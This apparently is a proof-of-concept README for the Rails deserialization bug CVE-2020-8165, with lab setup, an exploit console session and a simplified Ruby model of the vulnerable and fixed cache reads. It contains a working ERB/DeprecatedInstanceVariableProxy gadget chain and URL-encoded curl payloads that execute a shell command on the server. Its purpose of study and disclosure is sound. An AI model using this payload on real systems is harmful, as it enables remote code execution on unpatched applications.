## CVE-2020-8165 (Ruby on Rails)
For educational purposes only.
See References for the details; the Rails advisory linked there is the authoritative description of the bug.

## Environment
Ruby: 2.6.3
Rails: 5.2.3
Vulnerable: Rails < 5.2.4.3 and < 6.0.3.1 when untrusted input is written to MemCacheStore or RedisCacheStore with `raw: true` (fixed in 5.2.4.3 / 6.0.3.1).
## Run
```
$ git clone https://github.com/masahiro331/CVE-2020-8165.git
$ cd CVE-2020-8165
$ bundle install --path vendor/bundle
$ bundle exec rails db:migrate
# the app caches through Redis, so have it listening on 6379 before starting the server
$ docker run -d -p 6379:6379 redis
$ bundle exec rails s
```
## Exploit
```
$ bundle exec rails console
irb(main):> code = '`touch /tmp/rce`'   # Ruby the gadget will eval on the server
irb(main):> erb = ERB.allocate          # skips ERB#initialize, so @src is ours to set
irb(main):> erb.instance_variable_set :@src, code
irb(main):> erb.instance_variable_set :@filename, "1"
irb(main):> erb.instance_variable_set :@lineno, 1
irb(main):> # any method call on the proxy is forwarded to erb.result, which evals @src
irb(main):> payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result))
irb(main):> require 'uri'
irb(main):> puts URI.encode_www_form(new: payload)   # key must match the query parameter the app reads
$ curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
$ curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
```
Send the request twice. The first request gets the raw Marshal bytes written into Redis through the cache store; the second reads them back, and the affected store hands a `raw: true` entry to `Marshal.load`, rebuilding the proxy. As soon as the application touches the returned object, `erb.result` runs and the command executes. Confirm with `ls -l /tmp/rce` on the server.
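The gadget chain and the cache-store read path, modelled outside Rails as an added example (not code from this repository or from Rails). `ProxyStandIn` is a constructed stand-in for `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy`: like the real proxy, it forwards every call to `@instance.send(@method)`. `vulnerable_read` and `fixed_read` are an assumed, simplified model of how the store treats a `raw: true` entry before and after the fix, not ActiveSupport's code. The ERB half of the chain is the real stdlib class, built exactly as in the console session above; the payload evals `40 + 2` instead of running a shell command.

```ruby
require 'erb'
require 'uri'

# Constructed stand-in for ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
# (assumption: not Rails code). Like the real proxy, every method call is forwarded
# to @instance.send(@method); with @instance = ERB and @method = :result that is an
# eval of @src the moment the application touches the object.
class ProxyStandIn
  def initialize(instance, method)
    @instance = instance
    @method   = method
  end

  def method_missing(name, *args, &block)
    @instance.__send__(@method).__send__(name, *args, &block)
  end

  # String interpolation calls to_s explicitly, so forward it too.
  def to_s
    method_missing(:to_s)
  end
end

# Build the Marshal payload the way the PoC does: ERB.allocate skips ERB#initialize,
# so @src holds attacker-chosen Ruby instead of compiled template code.
def build_payload(ruby_code)
  erb = ERB.allocate
  erb.instance_variable_set(:@src, ruby_code)
  erb.instance_variable_set(:@filename, '1')
  erb.instance_variable_set(:@lineno, 1)
  Marshal.dump(ProxyStandIn.new(erb, :result))
end

# The bytes as they travel in the query string (?new=...), as in the curl commands.
def as_query_param(payload)
  URI.encode_www_form(new: payload)
end

# Simplified model (assumption, not ActiveSupport's code) of the affected read path:
# whatever was stored, including a value written with raw: true, is handed to
# Marshal.load; only data that is not Marshal format comes back as the original string.
def vulnerable_read(stored)
  Marshal.load(stored)
rescue TypeError, ArgumentError
  stored
end

# Model of the fixed behaviour (Rails 5.2.4.3 / 6.0.3.1): an entry read with
# raw: true is returned as the string that was written and is never unmarshalled.
def fixed_read(stored, raw:)
  raw ? stored : Marshal.load(stored)
end

# Something ordinary the application does with the cached value. The interpolation
# calls to_s on the proxy, which calls erb.result, which evals @src.
def render(value)
  "cached: #{value}"
end

# Run the payload through the vulnerable path and report what happened. Newer erb
# releases refuse ERB#result on an instance that never went through initialize
# (ArgumentError), so the outcome is reported rather than assumed.
def exploit_outcome(payload)
  [:executed, render(vulnerable_read(payload))]
rescue ArgumentError => e
  [:blocked, e.message]
end

if __FILE__ == $PROGRAM_NAME
  payload = build_payload('40 + 2')          # harmless stand-in for `touch /tmp/rce`
  puts as_query_param(payload)               # new=%04%08o%3A%0FProxyStandIn...
  p exploit_outcome(payload)                 # [:executed, "cached: 42"] on Ruby 2.6
  p render(fixed_read(payload, raw: true))   # the raw bytes as a string, nothing executed
end
```

Two things worth noticing when you run it: `Marshal.load` alone never executes anything, the code runs only when the application calls a method on the object it got back, so the sink is every place that touches a cached value; and the fix is not in ERB or Marshal but in the store refusing to unmarshal data it did not serialise itself, which is the same check you want around any `raw:` cache read of user-controlled data.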
## References
https://groups.google.com/forum/#!topic/ruby-security-ann/OEWeyjD7NHY